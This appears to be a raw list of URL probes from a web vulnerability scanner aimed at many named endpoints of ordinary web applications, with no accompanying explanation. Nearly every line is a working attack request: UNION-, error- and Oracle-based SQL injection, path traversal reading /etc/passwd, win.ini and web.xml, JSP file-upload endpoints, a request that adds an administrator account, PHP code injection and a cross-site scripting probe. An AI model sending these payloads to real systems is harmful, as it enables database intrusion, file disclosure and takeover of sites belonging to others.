/information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
/information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
/message/mytreedata.asp?bumenid=-12%20AND%201432=CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)))--%20&time=&time=
/house/upload/upload.asp
/sbweb/Upload_Save_2.asp
/feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--
/jsearch/admin/opr_forcechangepwd.jsp
/home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20--
/celive/live/index.php?action=1
/admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
/baseNews_view.jsp?newsId=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--
/Lesktop/command.aspx
/Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
/Lesktop/sendfile.aspx
/Office_Supplies/Goods_Main.aspx?type=1&info_id=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/Infomation.aspx?userid=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/VacationComputation.aspx?id=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/RCMANAGE_New/rcgl.aspx?UID=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/ObjSwitch/HYTZ.aspx?userid=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
/jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20--
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,md5(1122),0x7e),NULL,NULL,NULL,NULL
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL%23
/jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp
/managerNManager.action
/lm/manage/opr_setappraisal.jsp?fn_billstatus=E&vc_setapprid=-2087%20UNION%20ALL%20SELECT%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL%20FROM%20DUAL--
/jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4
/lm/sys/opr_bulletin_show.jsp?vc_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/lm/front/mailpublist.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20--
/jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,0x7765627363616E3A693A66696E64,0x7e)%23
/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/admini/question/question.aspx?ID=25'%20and%20char(106)%2bchar(106)%3E0%20--
/ModifyNewsAction.do?newsID=-12
/plugins/qmail/MailTo.aspx?mail=1%27and%02CHAR(106)%2bCHAR(39)%3E0%02and%02%271%27=%271
/manage/Template/DSManage.aspx
/index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1
/api.php?id=_arclist&c=api&f=phpok&param[pid]=41&param[notin]=41)%20Union%20Select%201,md5(1122),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
/admin/admin_adminmodifypwd.aspx
/jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20--
/feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/Modules/jycg/SFDB.aspx?sfpjnm=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116),NULL%20--&type=1
/print/search_print_proof.jsp?proof_no=just_sql_test'
/include/user/mulbumentree.asp
/include/user/usertree.asp
/include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20--
/public/oa_nodebanliren_frm.asp
/include/chaxundetail.asp
/include/user/bdtreemx.asp
/admin/Fileup.aspx?path=notice/upload
/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20UNION%20SELECT%201,2,3,md5%281122%29,5,6,7,8,9%23
/inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/hlp/help.asp?HlpCode=1'%20and%201=char(106)%20--
/Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20--
/ModifyNewsAction.do?newsID=-12'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%20%23
/piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
/schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
/common/mod/ajax.ashx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=-1'%20and%201=char(106)%20--
/dakai.aspx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=3'%20and%201=char(106)%20--
/Permission/Application_Query_List.aspx?deptName=3'%20and%201=char(106)%20--
/main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
/index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20--
/website/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29--
/varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20--
/getpassword.php?do=login
/api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
/servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
/servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
/index.php?m=register&c=ajax_reg
/api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
/witapprovemanage/apprvaddNew.jsp?flowid=%27%20and%201=2%20UNION%20SELECT%201,2,3,4,char(106)%2bchar(60),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29;--%20-
/nicknamelogin.jsp
/jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
/lm/objectbox/selectx_groupuserlist.jsp?vc_parid=-42873%27+or+%271%27=%271
/index.php?m=register&c=ajax_reg
/inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager
/ajaxfs.php?tooltip=5254'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20%23
/utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile
/?q=node&destination=node
/UtilServlet?name=-1'%20UNION%20ALL%20SELECT%20NULL,%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)--%20&operation=getUserInfo&time=12
/jcms/m_5_e/module/individuation/opr_individuation_unit.jsp?fn_billstatus=B&sub_row=just_test
/govdiropen/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=..././..././..././..././..././..././WEB-INF/ini/merpserver.ini&webid=1&type=1&downname=just_test.txt
/down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns)
/api/CheckMemberLogin.ashx?type=mobileisexist
/comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D
/LoginCheck.aspx
/NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
/index.php?c=api&m=data&auth=finecms&param=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f
/Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at
/show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT
/NTRdrS_RegistInfo.aspx?BookRecno=1'%20AND%209211=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'AT'='AT
/NTRdrBookRetrInfo.aspx?BookRecno='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20chr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%20from%20DUAL))%7C%7C'
/NTRdrBookRetrInfo.aspx?BookRecno=18273&NewBIBNO=111%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)&NEWBOOK=newbook
/NTBookRetrTopShowright.aspx?page=1&Index=6&LocLmt=&SrchTab=3&Acurate=3&Key='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%20from%20DUAL))%7C%7C'&AllName=A++
/zfcgFrame/xx_look.aspx?ID=-1%27%20UNION%20ALL%20SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29--%20
/AdminP
/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23
/public/download.asp?filename=../login2.asp/
/Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
/index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23
/API/DownloadProducts.ashx
/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20--
/ProductUnSales.aspx?keywords=uio%2527&tagIds=1_2))%20T%20WHERE%201=1%20and%201=(select%20char(106)%2bchar(106))%20--%20&pageIndex=1
/SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
/MShop/Partial/SuppLogo
/ShoppingHandler.aspx
/bq/Data/BIData.zip
/jphoto/objectbox/selectx_search.jsp?spell=1%25%27%20UNION%20SELECT%20CHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2899%29%7C%7CCHR%2899%29%2Cnull%20FROM%20DUAL%20--
/vc/vc/columncount/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20
/cms/voteManager/voteaction.jsp
/EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
/ShopManage.aspx
/RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
/SNS/Product/WaterfallProductListData
/ProSales/GetListCate
/jphoto/jphoto/sys/member/opr_export.jsp
/JwGl/jxjh/JxjhXGBc.asp
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../index.jsp
/defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23
/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL--
/cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke=
/cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page=
/login.asp
/search.php
/LoginCheck4.asp?LoginLb=jwc&Account=1'%20AND%201=CHAR(106)%20--&PassWord=0
/jwgl/jxjh/jxjha.asp
/jwgl/jcxx/savetofile.asp
/public/jsp/livephotoupload.jsp?path=archives&mode=add&hiddenName=1.jsp&visualName=2.jsp
/Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
/govezoffice/gov_documentmanager/senddocument_import.jsp?categoryId=1&path=archives&mode=add&fileName=1.jsp&saveName=2.jsp&fileMaxSize=0&fileMaxNum=100&fileType=jsp
/edoas2/edoas2_test.jsp
/Report/AjaxHandle/StationChoose/StationTree.ashx?STTP='KKK')%20AND%201587=CONVERT(INT,(CHAR(58)%2bCHAR(117)))%20--&RadioType=Radio_XZ&ReportID=Report22
/celive/live/header.php
/SystemManage/AjaxHandle/AjaxVertifyUserID.ashx?uid=1'%20AND%201=CHAR(106)%20--
/skywcm/webpage/download.jsp?absolutePath=C:%5Cwindows%5Cwin.ini&downFileName=win.ini
/RdrRInforDetail.aspx?page=1&Index=4&KeyWord=AA'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&name=r_infor&AcqSys=CN
/m/info/top_rating.action?clsNo=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'at'='at
/BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/Plan/FloodPlan/FileEdit.aspx?id=1'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
/Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10&timestamp=
/plan/FloodPlan/FloodPlanFileShow.aspx?ReadOnly=&ID=499'%20AND%203=CHAR(106)%2bCHAR(99)%20--&filetype=156&ParentID=0&adomParameter=292
/admin/admin_database.aspx
/flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20--
/video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58))
/blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20
/?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23
/search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/ModifyNewsAction.do?newsID=364'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05'%20and%201=(select%20char(106))%20--
/model/TwoGradePage/Equipment_detail.aspx?id=11314%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=12%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/newsdetail.aspx?id=279&columnId=70%20and%201=(select%2bchar(106))
